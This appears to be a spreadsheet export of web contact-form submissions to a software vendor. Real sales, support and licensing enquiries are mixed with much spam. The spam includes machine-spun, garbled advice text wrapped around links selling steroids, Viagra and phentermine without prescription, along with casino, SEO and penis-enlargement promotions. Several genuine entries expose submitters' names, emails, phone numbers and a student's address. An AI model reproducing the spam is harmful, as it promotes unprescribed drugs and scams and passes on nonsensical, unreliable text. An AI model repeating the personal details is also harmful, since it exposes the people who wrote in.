  [url=http://www.contrapunteo.com/wp-content/crypt.php?jk=372-Clomid-For-Sale-Pct,Mesterolone-Cycle,Primobolan-Powder-Conversion.html]Clomid For Sale Pct[/url]_x000D_
 One of the more popular things men and women do in order to make their asthma condition a whole lot worse is adding their hands and wrists around their encounter. The hands touch a variety of things throughout the day and when they are messy, the debris can move from the hands in your encounter and then in the end in your lungs. To avoid additional complicating your asthma situation and lower the chance of an asthma attack attack, scrub your hands regularly whilst keeping them from your deal with._x000D_
  [url=http://www.djss-delfin.ru/cli/yea.php?hl=28]Hygetropin Effets Secondaires[/url]_x000D_
 So that you can bring up great kids it is essential to tell the truth with them. Make sure to usually educate your kids the truth in almost everything. Establishing an excellent illustration is likely to make them wish to be genuine. Over the years, trustworthiness and believe in may ultimately bring fantastic advantages._x000D_
  [url=http://www.fashionbiz.com.br/wp-content/menu.php?sd=105-hygetropin-100iu-red-top,hygetropin-for-sale-china,hgh-injections-arizona.html]hygetropin 100iu red top[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.arsalelektrik.com/Scripts/box.asp?a=223-Viagra-Pills-Nz,Buy-Viagra-Uk,Cheap-Viagra-New-Zealand]Viagra Pills Nz[/url]_x000D_
 Don't let hair hang up in your experience and don't lean on your hands or contact your face unnecessarily. Whenever your locks details the face, natural fats through your hair along with any your hair item you may use exchange in your pores and skin. If you feel your facial skin, any grime or germs which may be on the hands and wrists shift to the pores and skin. This results in zits episodes._x000D_
  [url=http://www.fitkid.rs/images/temp/site.php?as=196-kigtropin-results-jintropin-blue-tops-igf-1-cancer.html]kigtropin results[/url]_x000D_
 Be careful concerning the software that you want to download. Some apps can be extremely damaging to your iPad's operating system as well as others will strain your battery pack at the rediculously higher rate. You should check critiques to have an application before you decide to obtain it in the actual display screen that you would entry to acquire it._x000D_
  [url=http://www.clerequirements.com/wp-content/file.php?tj=1426-Testosterone-Shots-And-Fertility,Stanozolol-Side-Effects,Testosterone-Enanthate-Suppliers-Uk/]Testosterone Shots And Fertility[/url]_x000D_
 Keep an eye on everything you take in in the meals log or on the web. Counting calories is much easier when you have every little thing saved in a single. It might prevent you from proceeding towards your diet plan program once you know you'll have to create every little thing lower. Moreover, when you notice you aren't producing advancement, you are able to reminisce at what you've been ingesting and identify problems._x000D_
  [url=http://ndlm.nasscomfoundation.org/wp-content/uploads/simple.php?th=460-Clomiphene-Cost-Australia-Anabolic-Steroid-Names-Testosterone-Injections-Ireland.html]Clomiphene Cost Australia[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We had mail returned to us that we sent to you. It was stamped NOT DELIVERABLE/Box Closed RETURN TO SENDER. can you please give me an updated correct address to send it to? thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern:_x000D_
Hello, my name is Bitanya Kebede. I am an 8th-grade student at Argyle Magnet Middle School in Silver Spring, Maryland. I have received an assignment that entails interviewing a worker in my field of interest. I would like to pursue the IT department as I grow older, preferably becoming an IT Manager. Are there any available IT Managers or IT Specialists that I could contact for an email interview? It would not be a lengthy process, just a quick Q&amp;A. You're welcome to email me back at bitanyakebede03@gmail.com._x000D_
Thank you so much for the opportunity! _x000D_
</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://playcasinoonline24.com/]slot online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino games&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t xml:space="preserve">looking to integrate RightFax with new software for a client and help resell to them._x000D_
</t>
  </si>
  <si>
    <t>consolidate multiple digital asset tools into one solution</t>
  </si>
  <si>
    <t>I am trying Tto install a trial version of Brava to see how it handles viewing a PRT file.  Unfortunately I am doing this on an airgapped network with no access to the internet.   How can I activate the software?  Thanks.</t>
  </si>
  <si>
    <t>Hola que tal, estoy interesado en conocer Documentum para un proyecto que estamos gestionando, podría alguien de ventas contactarme?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I would like to speak to a sales rep regarding your procurement-related products.  Specifically, if you have a solution for tracking supplier performance and compliance._x000D_
_x000D_
Thanks,_x000D_
Matt </t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
We have right fax application used to send physical fax to emails . But we just want to know whether right fax application can be used to get fax when users drops a email. </t>
  </si>
  <si>
    <t>I was wondering you had an update on when rightfax 16.4 will be released and does it have the capabilities of viewing the confirmation pages through the webclient?</t>
  </si>
  <si>
    <t>trying to create a support ticket</t>
  </si>
  <si>
    <t>Product breakdown._x000D_
Sorry we seem to have some confusion on the organization of your products. We are looking at ECM replacement software. Have seen the ECM product suite but have also seen InfoArchive and Documentum as options as well. Could some one send us a quick difference between the options so we can determine which to research._x000D_
_x000D_
Thank you,_x000D_
John</t>
  </si>
  <si>
    <t>Good afternoon_x000D_
_x000D_
Our company requires information and prices of the solution of RIGHT FAX SERVER FOR CANON_x000D_
_x000D_
We have a project with the company Diners CLub and at the moment they use their solution in Xerox equipment. The idea is to know how it works and what are the requirements to work with Canon._x000D_
_x000D_
Thank you so much</t>
  </si>
  <si>
    <t>For job openings on MSSQL DBA</t>
  </si>
  <si>
    <t>рф рб грузоперевозки харьков аэропорт_x000D_
перевозка пианино спб_x000D_
транспортные компании актобе_x000D_
перевозка опасных грузов обучение могилев_x000D_
омск перевозка транспортный_x000D_
что такое перевозка_x000D_
рб грузоперевозки красноярск на_x000D_
тарифы грузоперевозок рб_x000D_
грузоперевозки открыть компанию_x000D_
инструкция по перевозке грузов_x000D_
 _x000D_
[URL="http://game-monitoring.16mb.com/user/Michaelwrild/"]с бухгалтерия грузоперевозки в рб[/URL] _x000D_
[URL="http://xueyunshe.com/home.php?mod=space&amp;uid=108268&amp;do=profile&amp;from=space"]грузовое такси комсомольск[/URL] _x000D_
[URL="http://theundergr0und.org/index.php?action=profile;u=17458"]перевозка грузов пермь знакомства[/URL] _x000D_
[URL="http://qiwing.com/home.php?mod=space&amp;uid=19410"]рф грузоперевозки екатеринбург новости[/URL] _x000D_
[URL="http://d3rerra.coolpage.biz"]беларусь перевозка грузов омск погода[/URL]</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
At Workday, we are currently looking for platforms to replace our Drupal Community platform and would like to gather your input about our requirements and setup a demo._x000D_
_x000D_
Thanks,_x000D_
Dan_x000D_
</t>
  </si>
  <si>
    <t>Currently own a very old version of Teleform. Need to look at upgrade options due to software not working on modern OS.</t>
  </si>
  <si>
    <t>Hola que tal, me gustaria obtener ma sinformacion de la solucion de digitalizacion de documentos para el sector publico. Tenemos una invitacion para presentar un poryecto del gobierno local.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Je conseille actuellement un de mes clients, un fond d'investissement, dans l'acquisition d'un ECM._x000D_
Je souhaiterais avoir plus d'informations à propos de votre offre, tant sur la partie ECM que BPM._x000D_
Merci d'avance, _x000D_
</t>
  </si>
  <si>
    <t>Having issues with fax service</t>
  </si>
  <si>
    <t>Signup for Enterprise World 2018 Conference and Training U-TR-3 -0188a</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
_x000D_
As part of my company's preparation for GDPR, we would like to issue an updated set of terms to document the Controller : Processor relationships between our companies. Please can you provide me with an email address to which I can direct this._x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Tom </t>
  </si>
  <si>
    <t xml:space="preserve">We are a current customer of yours. We would like to see if we could get help with EDI translation. We would like to send orders (PO's) to our vendors via EDI. Please contact me at your convenience. I can be reached at 314-534-7150 or kevin.flavin@brauersupply.com. </t>
  </si>
  <si>
    <t>would like to get more information about your fax systems</t>
  </si>
  <si>
    <t>1982-2014 CSRC.2015.007 _x000D_
sales@zoom-entertainments.co.uk</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText_x000D_
I have already sent a request for someone to contact me but I've had no reply. I am looking to purchase your software so i can measure pdf's, that is all i need it to do, so please can someone tell me which particular software i need to order?_x000D_
kind regards_x000D_
Darren Rigby_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I have several thousand Auto-Trol files (.dg) that I need to batch convert to cgm or another compatible file type that I can import into IsoDraw. In searching the web I came across documentation for Spicer Imagenation which appeared to describe the capabilities I am looking for. I saw that they have been bought by your company and wondered if you could tell me if you maintained that function.</t>
  </si>
  <si>
    <t xml:space="preserve">requirement georgia government police officer shoots out person At harmful location cbs television studios atlanta_x000D_
_x000D_
CW69About cbs television studios hdtv areas range (until now important channels corporation), one particular scale associated with cbs television studios inc, known as got into the smyrna present september 1, 1995, paying for WVEU television for computer through BCG emails, which will gripped the most important licence mainly because to stay in 1981. [url=https://twitter.com/latamdate?lang=en]LatamDate Scam[/url] inside December 11, 1995 the email characters experienced re-structured to mirror the fresh use in addition,yet supervision in order for WUPA shows. woodstock training blowers create a exciting new selection for facts and information about a common clubs. with one of the number one, numerous experienced regional things employees in the us, WAOK providescoverageof breakage thing, neighbourhood things, provider, exercise in addition to home theater._x000D_
_x000D_
researches outlet stores guide because college cops say the unwanted specialist was most building in someones spare time safeguarding job with a Greyhound coach bus sta on sunday [url=https://10datingsites.com/product/latamdate-com/]Latamdate[/url] the evening if ever the taking pictures went wrong. and approached that person._x000D_
_x000D_
ga propose institution police main joseph Spillane says that whenever the man mauled the officer. the main promises the representative worn spice up product, only was feeling for her life in addition,yet included her marker. Spillane claims [url=https://www.youtube.com/watch?v=9ceLOUkByZA]LatamDate SCAM[/url] the man must have been go in a very bear and consequently arrive at a medical._x000D_
_x000D_
he as strong standing. your current official were damaged._x000D_
_x000D_
Spillane predicts the main police officer could be on deposited entrust expected inquiry._x000D_
_x000D_
Most Viewedare usually and therefore suwanee can be found where you can the Nation most popular communitiesSome of the nation can </t>
  </si>
  <si>
    <t>References of an Italian distributor for technical support.</t>
  </si>
  <si>
    <t>I want to know which product that it suitable for our customer. They are in need to view DWG files with Xref funktionality in Sharepoint. All their dwg and PDF´s files are stored in Sharepoint. I also want to know the price for the product.</t>
  </si>
  <si>
    <t>Интернет казино Вулкан - официальный онлайн луб [url=http://casino-vulkan-777.space/arctic-fortune/] вот[/url] Казино Онлайн деньги и проводите время с выгодой!  gi31afe</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We have updated 55th DAC - Design Automation Conference Attendees list and we now have a total of 4,178 contacts attending 55th DAC - Design Automation Conference 2018 event._x000D_
_x000D_
Would you be interested in the list of Attendees with complete contact information for pre-show marketing campaign, appointment sitting, networking and various other post-show Marketing initiatives._x000D_
Data fields: Company names, Contact name, Title designation, email address, phone number, complete mailing address. We only include opt-in contacts in our database. We can also provide free sample for your verifications._x000D_
_x000D_
Thanks &amp; I’ll look forward to your response._x000D_
_x000D_
Regards,_x000D_
Sara  Smith_x000D_
sara.smith@trinetsys.com_x000D_
Trinetsys-Event Attendees Specialist._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Enerrgy Authority is currently running customized eDocs 5.3.1. We are now moving to Azure and all our services will be on PAAS. We would like to know it there any cloud based(Azure) solutions to migrate our DM databases and to have new cloud DM databases? </t>
  </si>
  <si>
    <t xml:space="preserve">Would like to have quota for RighFax solution, which will be configured behind Avaya CM 6.0. </t>
  </si>
  <si>
    <t>I am looking for a tool that is able to scan, capture, deconstruct, group, validate, workflow and output as a text file all the maintenance instruction related data and data elements. The tool may also be required to interface with SAP PM, Primavera and an APM tool.</t>
  </si>
  <si>
    <t>Inputs on Process Orchestration offerings</t>
  </si>
  <si>
    <t>We are in Banking, Financial Services and Insurance Sector. Looking around for analytics product to integrate with our existing applications. Looking forward to hear from you.</t>
  </si>
  <si>
    <t>Please send the quote for below:_x000D_
_x000D_
Content Suite Platform Standard Named Users Maintenance, Part #: 1000030882, S-LLPGECMCLM_M. Period of Coverage: July 1, 2018 through June 30, 2019._x000D_
Quantity - 100_x000D_
_x000D_
_x000D_
Release Script for Kofax Capture Production Maintenance, Part #: 1000030401, S-LLCAPRLS_M. Period of Coverage: July 1, 2018 through June 30, 2019._x000D_
Quantity: 1</t>
  </si>
  <si>
    <t>Respected Sir, _x000D_
I am volunteer / Trustee of Sri VivekanandaSevashrama a registered &amp; long sustained NGO serving _x000D_
the society in the area of PREVENTION &amp; CONTROL OF BLINDNESS in rural Karnataka at the _x000D_
patient's door step. Till date, We got credit of 42,000 FREE IOL IMPLANTATION CATARACT EYE _x000D_
SURGERIES TO OUR CREDIT INCLUDES 226 for children below 16 years _x000D_
_x000D_
We hold FERA &amp; 80-G vaild certificates, do fulfill all the norms of Corporate Social _x000D_
Responsibility.- ACT &amp; DPE Norms. _x000D_
_x000D_
We are sure TEKLINK  will join our hands in carrying out this noble work. _x000D_
_x000D_
Any more information needed kindly do not hesitate to call us._x000D_
_x000D_
We also request to give us an opportunity to share our service n PPT 15 Min followed b _x000D_
discussion at your work place in convenient time &amp; date. _x000D_
_x000D_
Sir, Kindly see some of Eye surgery camp photos up loaded in face book/ google in : _x000D_
vivekeyecare1- SIGHT TO THE SIGHTLESS _x000D_
_x000D_
Thanking you Sir, _x000D_
_x000D_
K.Nagaraja Trustee , SVA - Mobile 9900234366</t>
  </si>
  <si>
    <t>Respected Sir,  WE ARE IN SEARCH CSR PARTNER - _x000D_
I am volunteer / Trustee of Sri VivekanandaSevashrama a registered &amp; long sustained NGO serving _x000D_
the society in the area of PREVENTION &amp; CONTROL OF BLINDNESS in rural Karnataka at the _x000D_
patient's door step. Till date, We got credit of 42,000 FREE IOL IMPLANTATION CATARACT EYE _x000D_
SURGERIES TO OUR CREDIT INCLUDES 226 for children below 16 years _x000D_
_x000D_
We hold FERA &amp; 80-G vaild certificates, do fulfill all the norms of Corporate Social _x000D_
Responsibility.- ACT &amp; DPE Norms. _x000D_
_x000D_
We are sure TEKLINK  will join our hands in carrying out this noble work. _x000D_
_x000D_
Any more information needed kindly do not hesitate to call us._x000D_
_x000D_
We also request to give us an opportunity to share our service n PPT 15 Min followed b _x000D_
discussion at your work place in convenient time &amp; date. _x000D_
_x000D_
Sir, Kindly see some of Eye surgery camp photos up loaded in face book/ google in : _x000D_
vivekeyecare1- SIGHT TO THE SIGHTLESS _x000D_
_x000D_
Thanking you Sir, _x000D_
_x000D_
K.Nagaraja Trustee , SVA - Mobile 9900234366</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We bought version 6.1, but never used it.  _x000D_
 _x000D_
Now we have Win10.  So can we enable the 7.+ software with the same key?_x000D_
_x000D_
Can you please send me details for me to download new version for Win10._x000D_
_x000D_
Thanks_x000D_
Gopi Krishna (licence number 52283124)</t>
  </si>
  <si>
    <t>For job oppurtunity</t>
  </si>
  <si>
    <t>Today I purchased Brava Desktop TX but have not received a link to download the program.  My invoice number is 186388 and would like to be able to use the product as soon as possible.  Many thanks for your help.  Louisa King</t>
  </si>
  <si>
    <t>Looking for a ECM system on behalf of a Bank in Vietnam</t>
  </si>
  <si>
    <t>Access to account, I have just taken over the System Admin role at monash council and would like to setup access to the existing faxing account.</t>
  </si>
  <si>
    <t>Evaluation of Documentum</t>
  </si>
  <si>
    <t>I would like more information on your OEM solutions for startups.  I am very interested in embedding analytics on my website but I cannot afford a large investment until I see how it goes.  It would be nice if you had a scalable option but, in any even, I would appreciate more information.  Thank you for your time._x000D_
_x000D_
Valerie Braun</t>
  </si>
  <si>
    <t>Require HPE Designer and Prod licenses for ASIA setup. We have a global contract, please contact me asap reqgarding new licencse.</t>
  </si>
  <si>
    <t>Достаточно непростой задачей поисковой оптимизации является продвижение корпоративного сайта. Качественное продвижение в Яндексе или Гугле поможет повысить посещаемость корпоративного сайта. Подробнее читайте на сайте [url=http://gdefile.ru]gdefile.ru[/url]</t>
  </si>
  <si>
    <t>doi:10.1038/protex.2015.007</t>
  </si>
  <si>
    <t xml:space="preserve">We have a client that uses an older version of the Captaris Alchemy product and would like to know if we can get the installation media to put the server on their new hardware. The client is FPK Security and Investigations in Santa Clarita California. They are currently using version 8.2 Build 200.303 on a Windows 2003 server. We are retiring that server and have installed a new Windows 2016 Essentials server for them. Please contact me at your earliest convenience. </t>
  </si>
  <si>
    <t xml:space="preserve">I've just opened my Hummingbird Helix 7 and all I have is the 2 discs for instructions and I'm an old timer and sure would like a instruction book and I would gladly pay for it. I need to see pictures and read more than once to help me understand. Thanks </t>
  </si>
  <si>
    <t>casino blackjack &lt;a href="https://myonlinecasino24.com/#"&gt;online casino real money&lt;/a&gt; mgm online casino | [url=https://myonlinecasino24.com/#]casino online[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.atlantiquegites.com/old/list.php?id=1551-Trenbolone-Acetate-Nz,Nandrolone-New-Zealand,Testosterone-Phenylpropionate-Vs-Propionate]Trenbolone Acetate Nz[/url]_x000D_
 Go online. There are tons of coupons on the web that aren't obtainable in your neighborhood documents. Not just that, but some businesses offer Online only offers that other folks are not going to get. Before you buy anything, check out on the web and perform a search to discover any vouchers readily available._x000D_
  [url=http://www.wloskiepodroze.pl/wp-content/user.php?page=610-Methandienone,Buy-Stanozolol-Tablets-Australia,Mesterolone-Canada]Methandienone[/url]_x000D_
 Does your iPhone's battery pack drain too quickly? Consider switching away from the "Placing Time Area" characteristic. You can access this by looking at options, then area professional services, and ultimately, program solutions. The, switch the setting from on to off of, and chances are that your battery lifespan will find a significant boost._x000D_
  [url=http://www.msrisuty.cz/includes/media.php?start=168-Buy-Boldenone-Uk-Nandrolone-New-Zealand-Testosterone-Phenylpropionate-Vs-Propionate]Buy Boldenone Uk[/url]_x000D_
 Pick a market that you are currently keen about. Using this method you will have a real fascination with the things you are operating a blog about which will reflect in your producing. It might seem foolish however when you are keen about what you discuss, your readers should be able to explain to._x000D_
  [url=http://www.ryzhenkova.com/wp-content/filter.php?y=766-Nandrolone-Generic-Name-Clomid-Australia-Price-Mesterolone-Ireland/]Nandrolone Generic Name[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I want to order a product but i  dont want to open a pay-pal account._x000D_
Can’ t submit the paymand with visa!_x000D_
Is there a reseller in the Netherlands?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Would like a demo for MAM for our Video Publications and also see what solution you can provide for our multiple departments to work together more efficiently....</t>
  </si>
  <si>
    <t>Questions about RightFax Product</t>
  </si>
  <si>
    <t>I am web developer with five years of experience.please let me know if there is any position available.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, we are IT Company based in Saudi Arabia - Riyadh, we need your help to get the renewal price for the subscription for one of our customers and we will be waiting for your reply in this regard to send the items. </t>
  </si>
  <si>
    <t>PN</t>
  </si>
  <si>
    <t>phentermine 37.5 &lt;a href="https://onlinephenterminepills.com/#"&gt;side effects for phentermine&lt;/a&gt; phentermine coupon | [url=https://onlinephenterminepills.com/#]what is phentermine[/url]</t>
  </si>
  <si>
    <t>&lt;p&gt;Si lors de votre inscription chez Betclic, vous entrez le &lt;a href="https://www.codepromo-avantage.fr"&gt;code promo betclic valable&lt;/a&gt;, vous pourrez alors recevoir notre bonus de bienvenue.  Toutefois, il se portera exclusivement sur votre premier pari.&lt;br&gt;Cette offre constitue l’unique bonus en ligne qui ne comporte aucun risque!&lt;br&gt;une phrase simple: vous faites votre premier dépôt, jouez 1 min d'un montant de 100€. Si la chance ne vous sourit, le Dernier vous rembourse  la manière suivante:&lt;br&gt;• 10€ immédiatement après les résultats,&lt;br&gt; • 90€ après que vous avez obtenu l'activation de votre compte (code d'activation à saisir ou dans les 24 heures qui suivent les résultats si possédez déjà un compte est activé.&lt;br&gt;&lt;br&gt; vous est naturellement possible de prendre possession de cet argent. Nous vous aidons donc à faire fructifier votre argent, sans aucun risque, tandis que l'ouverture de notre site et nos services!&lt;br&gt;&lt;br&gt;Exemple pratique:&lt;br&gt;Vous avez décidé d'embaucher le pari de 100€ remboursés sur la rencontre Espagne-France.&lt;br&gt;Pour cela, vous pouvez procéder comme suit.&lt;br&gt;1ère étape&lt;br&gt;&lt;br&gt;-Effectuer un 1er dépôt d’au moins 100€ si vous souhaitez que le montant total du bonus de bienvenue. Cette somme vous sera totalement restitué si votre pari est perdant.&lt;br&gt;la 2 ème phase&lt;br&gt;Vous pouvez faire un pari remboursé.&lt;br&gt;Si, par exemple, vous avez décidé de parier sur la victoire de la France et la note correspondante est de 3 .5, alors vous emportez: 100 x 3.5= 350€, en cas de victoire de la France.  Dans le cas contraire (vous avez perdu votre pari) 10€  versés sur votre compte Betclic.&lt;br&gt;3e étape&lt;br&gt;Après un pari perdant et recevoir les 90€ restants, vous devez valider votre inscription en indiquant le code d'activation. Vous pouvez obtenir ce code d’activation suite à une demande effectuée auprès de Betclic et en fournissant quelques pièces justificatives personnelles (RIB et pièce d'identité).  Si vous souhaitez de plus amples informations sur cette vérifi</t>
  </si>
  <si>
    <t>phentermine online &lt;a href="https://phentermine24.com/#"&gt;phentermine weight loss&lt;/a&gt; phentermine online | [url=https://phentermine24.com/#]phentermine 37.5[/url]</t>
  </si>
  <si>
    <t>what is phentermine &lt;a href="https://onlinephentermine24.com/#"&gt;phentermine diet pills&lt;/a&gt; interactions for phentermine | [url=https://onlinephentermine24.com/#]side effects of phentermine[/url]</t>
  </si>
  <si>
    <t>We want to update the Brava Reader.</t>
  </si>
  <si>
    <t>I passed my Content Server v16 System Administrator Certification exam on 24 August 2017 and I wish to download the cert and the transcript. My cert serial is R9y1OrN2cO. How do I do that?</t>
  </si>
  <si>
    <t>[url=https://newsstand.joomag.com/en/the-penis-enlargement-bible-pe-bible-free-pdf-the-penis-enlargement-bible-pe-bible-free-pdf/0449798001526075058]https://newsstand.joomag.com/en/the-penis-enlargement-bible-pe-bible-free-pdf-the-penis-enlargement-bible-pe-bible-free-pdf/0449798001526075058[/url] _x000D_
п»їPenis is one of the most important parts of any manвЂ™s life. Many men are not satisfy with the size of their member and want to increase it overnight. However, there are numerous вЂmiracleвЂ™ product available in the market that are claiming for overnight results but unfortunately, they fail to deliver and put вЂlittle buddyвЂ™ in lots of pain. _x000D_
Recently, I came across something like вЂњholy grail of penis enlargementвЂ™ and it is written by John Collins and it is called Penis Enlargement bible (PE Bible). _x000D_
What is PE Bible? _x000D_
Penis Enlargement bible is a 94 pages guide which is consist of two step method of penis enlargement that help penis to increase 2 to 4 inches in 60 days. Moreover, the penis enlargement exercises explained inside this guide are safe and very effective. _x000D_
Even, I applied this 2-step method and saw increase of an inch in length and ВЅ inch increase in girth inside just 14 days. Before applying these techniques, I wasted lots of money on pills, creams, lotions, condoms, stretches and extenders without any permanent increase in my penis. _x000D_
The great thing about this method is even after 20 days the penis growth I got from PE bible is still there and now I have 6вЂќ steel-rod under my pants. _x000D_
What I found amazing inside JohnвЂ™s guide is that he backs his claims with lots of reviews and video testimonials from real customers. It is said that picture is worth ten times more than words and video is worth 100 times more than pictures. _x000D_
HereвЂ™s the video of customer who found increase in his penis with the help of John CollinsвЂ™s Penis Enlargement Bible _x000D_
Real Customer. Real Review _x000D_
Benefits of Large Penis: _x000D_
Although earlier researches proved</t>
  </si>
  <si>
    <t>warnings for phentermine &lt;a href="https://onlinephenterminepills.com/#"&gt;phentermine weight loss&lt;/a&gt; buy phentermine 37 5 online | [url=https://onlinephenterminepills.com/#]phentermine 37.5 without doctor prescription[/url]</t>
  </si>
  <si>
    <t>phentermine 37.5 &lt;a href="https://onlinephentermine24.com/#"&gt;interactions for phentermine&lt;/a&gt; phentermine online | [url=https://onlinephentermine24.com/#]what is phentermine[/url]</t>
  </si>
  <si>
    <t>phentermine 37.5 &lt;a href="https://phentermine24.com/#"&gt;phentermine weight loss&lt;/a&gt; phentermine hcl | [url=https://phentermine24.com/#]warnings for phentermine[/url]</t>
  </si>
  <si>
    <t>I require access to Qfiniti recording solution team support and software downloads</t>
  </si>
  <si>
    <t>Hi, I would like to get more information as we are currently looking at vendor platforms to leverage for the next version of our community platform. I have a list of detailed requirements that I would like to send as well.</t>
  </si>
  <si>
    <t>jaorlx@tulnl.xyz</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
On behalf of Blue Core, I take this opportunity to thank you for your most valuable time and your interest shown in our solution, support &amp; services. Blue Core is a blend of experience and expertise, and is poised to become a major player in providing the IT solutions, support &amp; services to diversified business environments._x000D_
 _x000D_
Blue Core provides a range of technical consulting and systems integration services to help customers architect, implement, and manage complex network computing in business environments. Our professional services team specializes in providing customers with advanced systems, software, storage and network architecture design consulting, platform integration, enterprise systems management and operation such as network security and advanced system software integration solutions._x000D_
 _x000D_
At Blue Core, we integrate people, processes and technology to deliver solutions tailored to meet our customers’ needs. These solutions help ensure that the necessary talent is available and properly aligned to meet our customers’ business objectives._x000D_
_x000D_
We have Engineers and can support you for below Services:_x000D_
_x000D_
SLA’s_x000D_
BreakFix_x000D_
AMC_x000D_
Networking_x000D_
Routing and Switching_x000D_
Servers   (HP-Dell-IBM)_x000D_
Cisco_x000D_
Microsoft_x000D_
SAN Storage_x000D_
EMC_x000D_
Virtualization_x000D_
Microsoft Exchange_x000D_
Hyper V Clustering _x000D_
Load Balancing_x000D_
Firewalls  (Sonicwall-Fortinet-Juniper-3Com)_x000D_
Migration_x000D_
Hot Swapping_x000D_
Technical Support_x000D_
_x000D_
_x000D_
_x000D_
We are providing Services and Onsite Support in below Countries 24/7:_x000D_
_x000D_
KSA_x000D_
Bahrain_x000D_
Dubai_x000D_
</t>
  </si>
  <si>
    <t>Hello. I have a ticket for an error while the user is trying to print a calendar from Firstclass. When attempting to print the Calendar from Firstclass, " the print job completes but the events within each date are squeezed together and can not be made out" It is not a printer driver or software issue. Any ideas on why the software acts up like that? Thank you!</t>
  </si>
  <si>
    <t>phentermine weight loss &lt;a href="https://onlinephentermine24.com/#"&gt;phentermine 37.5 mg&lt;/a&gt; buy phentermine | [url=https://onlinephentermine24.com/#]diet pills phentermine[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.kellyresources.co.uk/engine/assets.php?a=503]Viagra Costo A Confezione[/url]_x000D_
 Should you be looking to purchase property, it is important to do your research on any companies with that you will certainly be conducting business with. There are numerous companies who take advantage of very first time property buyers through the use of predatory lending techniques. Talk with the higher Enterprise Bureau prior to undertaking any business to make sure the company you might be coping with is really a respected one particular. This could save you severe headaches in the future._x000D_
  [url=http://www.mangotrips.co.uk/images/crypt.php?duck=31]Cheap Cialis Generic[/url]_x000D_
 Getting older should be done gracefully. Trying to be an grow older you are not only shows that you will be not secure in your own epidermis. Dress in your actual age with pride. Appear your very best and do whatever you can to become healthier, vibrant and match, but don't at any time conceal your real age with younger outfits or cosmetics that aren't fitted to your phase in everyday life._x000D_
  [url=http://www.alrabie.com/admin/pear.php?id=556-Viagra-Generico-Senza-Ricetta,Cialis-Vendita-On-Line-In-Italia,Levitra-Orodispersibile/]Viagra Generico Senza Ricetta[/url]_x000D_
 When you are suffering from hair loss, get some good the flow of blood in your go. This does not always mean you must get up on your face, but once you learn how, get it done! Understand some basic yoga positions like the downwards experiencing puppy. Just holding your feet for around 3 minutes will also help. You can also build or get a slant board and use it for around ten minutes per day._x000D_
  [url=http://www.phanbonviety.com/layouts/site.php?bng=960-Primobolan-Powder-Stanozolol-Side-Effects-Testosterone-Enanthate-Suppliers-Uk/]Primobolan Powder[/url]_x000D_
</t>
  </si>
  <si>
    <t>buy phentermine &lt;a href="https://onlinephenterminepills.com/#"&gt;phentermine weight loss&lt;/a&gt; phentermine side effects | [url=https://onlinephenterminepills.com/#]phentermine diet pills[/url]</t>
  </si>
  <si>
    <t>Trying to reset my password. But I am not getting an email. Our original EDI person is no longer with the company and not sure if he was the main point contact or not.</t>
  </si>
  <si>
    <t xml:space="preserve">I cant remember my fax to mail fax number  </t>
  </si>
  <si>
    <t>diet pills phentermine &lt;a href="https://phentermine24.com/#"&gt;buy phentermine&lt;/a&gt; phentermine for weight loss | [url=https://phentermine24.com/#]interactions for phentermine[/url]</t>
  </si>
  <si>
    <t>Interested in OEM of your capture software.</t>
  </si>
  <si>
    <t>I am trying to set up Report Builder 6.2 and it is asking for a Product Code of some kind. How do I get one for this please?</t>
  </si>
  <si>
    <t>I am looking for a Rightfax Solution that will utilize existing fax machines (ie Fax Bridge) that is compatible with Epic.</t>
  </si>
  <si>
    <t xml:space="preserve">do you offer strategic document outsourcing   </t>
  </si>
  <si>
    <t>Hello.  I'm trying to reach out to HR concerning an Enterprise Sales position in NYC.  It seems I'm not submitting my resume correctly.  I was formerly employed at Brandfolder and since have moved on.  Thank you.  Robert.</t>
  </si>
  <si>
    <t>Hi,_x000D_
Am trying to request a trial of opentext exceed from the web page but the form fails. _x000D_
_x000D_
Rob Iaboni</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I need to know what the last version of Hummingbird Exceed was for Windows XP SP 3.  Thank you. </t>
  </si>
  <si>
    <t>аппарат для сладкой ваты — 5000 рублей; стойка для него — 5000 рублей, или самому можно сделать; газовый баллон — 7000 рублей; аккумулятор — 5000 рублей. [url=https://vk.com/sladkaya_vata_na_prazdnik]сладкая вата[/url]</t>
  </si>
  <si>
    <t>Request for information</t>
  </si>
  <si>
    <t>My company is in the early stages of investigating document management systems.  I'd like to get a ballpark figure of the costs of your system._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Evaluación de Open Text como Enterprise Content Management y revisión de herramienta como generador de documentos.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
The reason why I'm sending you this e-mail is that I'm trying to get a trial version of NFS Client for windows, but the request never goes on and the page doesn't respond. Could you help me with that? We really want to try that service _x000D_
_x000D_
Thank you._x000D_
Dídac</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
